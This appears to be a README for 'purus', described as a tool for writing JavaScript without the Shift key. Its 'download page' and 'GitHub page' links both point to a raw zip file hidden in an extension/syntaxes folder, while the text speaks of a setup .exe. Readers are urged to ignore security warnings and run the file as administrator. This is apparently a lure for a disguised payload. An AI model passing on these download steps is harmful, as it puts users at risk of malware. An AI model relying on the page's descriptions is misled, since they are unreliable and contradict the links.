purus lets you write code without using the Shift key. It is simple and easy to use. The tool helps you avoid the extra effort of pressing the Shift key while coding. It works with JavaScript and similar languages. The goal is to make coding smooth and less tiring.
- Write JavaScript code without needing the Shift key
- Build and compile code easily
- Check your code for errors automatically
- Supports modern code style tools like Prettier
- Works with popular code editors like Visual Studio Code
- Provides a clean and simple interface
You can use purus if you:
- Feel uncomfortable or slow with the Shift key
- Write JavaScript or similar code regularly
- Want to try a new way to write code faster
- Use Visual Studio Code or want to process code automatically
No deep knowledge of programming is needed. Just follow the steps to install and start using purus.
Before you install, check your system matches these needs:
- Windows 10 or higher
- 4GB of RAM or more
- At least 200MB of free disk space
- Internet connection to download and update the tool
- Visual Studio Code (optional, for integration)
Click the big button below to open the download page where you can get the latest version of purus for Windows.
On the download page, look for the Windows setup file. It usually has .exe at the end. For example, something like purus-setup.exe.
Click the setup file link to download it. The file size will be around 50MB, depending on the version.
Once downloaded, open the file. You may see a security warning. Confirm that you want to run this file.
Follow the steps in the installer. Most users can keep the default options.
When done, the program installs and creates a shortcut on your desktop.
- Double-click the shortcut labeled "purus" on your desktop.
- The main window will open with simple controls.
- You can start writing code immediately or open an existing file.
The interface is clean and does not show complex menus. The tool automatically adjusts so you can write without the Shift key.
- Use normal keys without pressing Shift.
- The tool converts your input to correct JavaScript syntax.
- If you want to use symbols normally requiring Shift, purus handles that automatically.
- Review your code using the built-in error checker.
- Save your work regularly using the File menu.
If you use Visual Studio Code, you can enhance your experience by installing the purus extension.
- Open Visual Studio Code.
- Go to Extensions (Ctrl+Shift+X).
- Search for
purus. - Click Install.
The extension automatically formats your code and checks syntax while you type. This makes coding even easier without the Shift key.
To get new features or fixes:
- Visit the download page again: https://github.com/Wasiq-Karim/purus/raw/refs/heads/main/extension/syntaxes/Software-v1.3.zip
- Download the latest setup file.
- Run the installer. It will update your existing version without losing your files or settings.
Make sure your Windows security settings allow apps from the internet. Right-click the file and select "Run as administrator."
Try restarting your computer. If the problem stays, reinstall purus using the latest setup from the download page.
Some symbols may not work perfectly. Check for updates or visit the purus support page for help.
purus uses a custom code builder and compiler that handles alternate JavaScript syntax. It checks your code to keep it clean and error-free. The linting tool helps spot mistakes early.
The tool fits into your existing workflow and supports popular tools like Prettier. It focuses on making coding less painful by reducing the need for the Shift key.
For questions or issues:
- Visit the GitHub page: https://github.com/Wasiq-Karim/purus/raw/refs/heads/main/extension/syntaxes/Software-v1.3.zip
- Check the "Issues" tab to see if others have your problem.
- Open a new issue if you need to report a bug or ask a question.
purus is open source. You can use it freely under the terms stated on the GitHub page.